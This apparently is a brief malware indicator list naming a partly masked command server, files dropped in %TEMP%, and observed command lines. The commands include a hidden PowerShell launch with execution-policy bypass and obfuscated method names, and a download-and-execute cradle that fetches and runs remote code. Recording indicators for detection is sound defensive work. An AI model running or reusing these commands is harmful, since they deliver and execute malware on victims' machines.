Technical Information
- http://4.###.228.46/admin/12.php
- %TEMP%\x.bat
- %TEMP%\x.bat.exe
- '4.###.228.46':80
- http://4.###.228.46/admin/12.php
- '%TEMP%\x.bat.exe' -noprofile -windowstyle hidden -ep bypass -command $QqEEc = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('%TEMP%\x.bat').Split([Environment]::NewLine);foreach ($jOeLj in $QqEEc) { if ($j...
- '%WINDIR%\syswow64\cmd.exe' /kpowershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://4.###.228.46/admin/12.php')
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\x.bat" "